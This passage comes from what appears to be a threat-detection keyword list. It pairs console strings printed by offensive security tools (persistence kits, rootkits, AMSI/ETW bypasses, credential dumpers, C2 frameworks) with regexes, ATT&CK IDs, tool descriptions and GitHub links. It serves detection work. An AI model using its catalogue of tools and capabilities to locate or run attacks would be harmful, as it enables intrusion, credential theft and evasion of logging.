Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Configuring ~/.bashrc for persistence ... *",".{0,1000}\[\+\]\s\-\sConfiguring\s\~\/\.bashrc\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Linux header / Message Of The Day Persistence*",".{0,1000}\[\+\]\s\-\sLinux\sheader\s\/\sMessage\sOf\sThe\sDay\sPersistence.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Rootkit Configuration*",".{0,1000}\[\+\]\s\-\sRootkit\sConfiguration.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE 
Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Rootkit configured successfully*",".{0,1000}\[\+\]\s\-\sRootkit\sconfigured\ssuccessfully.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Setting up cronjobs for persistence ... 
*",".{0,1000}\[\+\]\s\-\sSetting\sup\scronjobs\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Systemd Root Level Service successfully configued!*",".{0,1000}\[\+\]\s\-\sSystemd\sRoot\sLevel\sService\ssuccessfully\sconfigued!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] [HELL HALL] pAddress : *",".{0,1000}\[\+\]\s\[HELL\sHALL\]\spAddress\s\:\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*[+] Adding your DLL to the LSA Security Packages registry key*",".{0,1000}\[\+\]\sAdding\syour\sDLL\sto\sthe\sLSA\sSecurity\sPackages\sregistry\skey.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) 
DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] AMSI Bypassed!*",".{0,1000}\[\+\]\sAMSI\sBypassed!.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*[+] Arbitrary Directory Creation to SYSTEM Shell technique !*",".{0,1000}\[\+\]\sArbitrary\sDirectory\sCreation\sto\sSYSTEM\sShell\stechnique\s!.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*[+] Ask4Creds Loaded*",".{0,1000}\[\+\]\sAsk4Creds\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Attack aborted. 
Exiting*",".{0,1000}\[\+\]\sAttack\saborted\.\sExiting.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*[+] Attempting DCOM NTLM relaying with CLSID*",".{0,1000}\[\+\]\sAttempting\sDCOM\sNTLM\srelaying\swith\sCLSID.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*[+] Attempting NP impersonation using method EfsRpc to launch *",".{0,1000}\[\+\]\sAttempting\sNP\simpersonation\susing\smethod\sEfsRpc\sto\slaunch\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*[+] Attempting NP impersonation using method PrintSpoofer to launch *",".{0,1000}\[\+\]\sAttempting\sNP\simpersonation\susing\smethod\sPrintSpoofer\sto\slaunch\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*[+] Attempting to call the target EXE from the mock 
directory*",".{0,1000}\[\+\]\sAttempting\sto\scall\sthe\starget\sEXE\sfrom\sthe\smock\sdirectory.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] auditd patched successfully*",".{0,1000}\[\+\]\sauditd\spatched\ssuccessfully.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*[+] Auto-generating Pyramid config for modules and agents*",".{0,1000}\[\+\]\sAuto\-generating\sPyramid\sconfig\sfor\smodules\sand\sagents.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*[+] Back to C&C Console*",".{0,1000}\[\+\]\sBack\sto\sC\&C\sConsole.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*[+] Bof replay:*",".{0,1000}\[\+\]\sBof\sreplay\:.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is post-exploitation Telegram 
Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*[+] Build pupysh environment *",".{0,1000}\[\+\]\sBuild\spupysh\senvironment\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*[+] Building GTFOBins lists*",".{0,1000}\[\+\]\sBuilding\sGTFOBins\slists.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*[+] Building linux exploit suggesters*",".{0,1000}\[\+\]\sBuilding\slinux\sexploit\ssuggesters.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*[+] Building S4U2proxy request for service: *",".{0,1000}\[\+\]\sBuilding\sS4U2proxy\srequest\sfor\sservice\:\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Building S4U2self *",".{0,1000}\[\+\]\sBuilding\sS4U2self\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] COFF Loader mode is selected!*",".{0,1000}\[\+\]\sCOFF\sLoader\smode\sis\sselected!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*[+] COM Hijacked!*",".{0,1000}\[\+\]\sCOM\sHijacked!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*[+] Connected to \\\\*\\IPC$*",".{0,1000}\[\+\]\sConnected\sto\s\\\\\\\\.{0,1000}\\\\IPC\$.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can 
list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*[+] Connnecting to all computers and try to get dpapi blobs and master key files*",".{0,1000}\[\+\]\sConnnecting\sto\sall\scomputers\sand\stry\sto\sget\sdpapi\sblobs\sand\smaster\skey\sfiles.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*[+] Copying a Shellcode To Target Memory*",".{0,1000}\[\+\]\sCopying\sa\sShellcode\sTo\sTarget\sMemory.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*[+] Could not find TeamFiltration config*",".{0,1000}\[\+\]\sCould\snot\sfind\sTeamFiltration\sconfig.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" 
"*[+] Create evil class for file transfer*",".{0,1000}\[\+\]\sCreate\sevil\sclass\sfor\sfile\stransfer.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*[+] Created Elevated HKLM:*",".{0,1000}\[\+\]\sCreated\sElevated\sHKLM\:.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*[+] Creating mock directories*",".{0,1000}\[\+\]\sCreating\smock\sdirectories.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. 
A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] Creating Service on Remote Target?*",".{0,1000}\[\+\]\sCreating\sService\son\sRemote\sTarget\?.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] delete single event log succ*",".{0,1000}\[\+\]\sdelete\ssingle\sevent\slog\ssucc.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*[+] Deobfuscated dump saved in file decrypted.dmp*",".{0,1000}\[\+\]\sDeobfuscated\sdump\ssaved\sin\sfile\sdecrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*[+] Direct syscalls have been disabled, getting API funcs from ntdll in 
memory!*",".{0,1000}\[\+\]\sDirect\ssyscalls\shave\sbeen\sdisabled,\sgetting\sAPI\sfuncs\sfrom\sntdll\sin\smemory!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Direct syscalls have been disabled, getting API funcs from ntdll in memory!*",".{0,1000}\[\+\]\sDirect\ssyscalls\shave\sbeen\sdisabled,\sgetting\sAPI\sfuncs\sfrom\sntdll\sin\smemory!.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] DLL dropped!*",".{0,1000}\[\+\]\sDLL\sdropped!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*[+] Domain Password Spray *",".{0,1000}\[\+\]\sDomain\sPassword\sSpray\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Downloading Fat Linpeas binaries*",".{0,1000}\[\+\]\sDownloading\sFat\sLinpeas\sbinaries.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*[+] DpapiDump Loaded*",".{0,1000}\[\+\]\sDpapiDump\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Dropping into shell*",".{0,1000}\[\+\]\sDropping\sinto\sshell.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*[+] Elevated to SYSTEM privileges*",".{0,1000}\[\+\]\sElevated\sto\sSYSTEM\sprivileges.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*[+] Encoding with base64 and reverse it to avoid detections*",".{0,1000}\[\+\]\sEncoding\swith\sbase64\sand\sreverse\sit\sto\savoid\sdetections.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script 
Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[+] Encrypting The Stack.... *",".{0,1000}\[\+\]\sEncrypting\sThe\sStack\.\.\.\.\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[+] Enumerating driver services...*",".{0,1000}\[\+\]\sEnumerating\sdriver\sservices\.\.\..{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] ETW Patched* No Logs No Crime !*",".{0,1000}\[\+\]\sETW\sPatched.{0,1000}\sNo\sLogs\sNo\sCrime\s!.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[+] Event Logger is Either NOT running or Already Killed Previously!*",".{0,1000}\[\+\]\sEvent\sLogger\sis\sEither\sNOT\srunning\sor\sAlready\sKilled\sPreviously!.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach 
+ Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*[+] Execute shellcode... press enter*",".{0,1000}\[\+\]\sExecute\sshellcode\.\.\.\spress\senter.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*[+] Exploit completed. Got a SYSTEM token! :)*",".{0,1000}\[\+\]\sExploit\scompleted\.\sGot\sa\sSYSTEM\stoken!\s\:\).{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#contentstrings","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*[+] Exploit successful! 
*",".{0,1000}\[\+\]\sExploit\ssuccessful!\s.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*[+] Exploit worked* it should execute your command as SYSTEM!*",".{0,1000}\[\+\]\sExploit\sworked.{0,1000}\sit\sshould\sexecute\syour\scommand\sas\sSYSTEM!.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*[+] Extracting LAPS password from LDAP*",".{0,1000}\[\+\]\sExtracting\sLAPS\spassword\sfrom\sLDAP.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*[+] Finding directory to hijack*",".{0,1000}\[\+\]\sFinding\sdirectory\sto\shijack.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*[+] Finished Enumerating Shares*",".{0,1000}\[\+\]\sFinished\sEnumerating\sShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - 
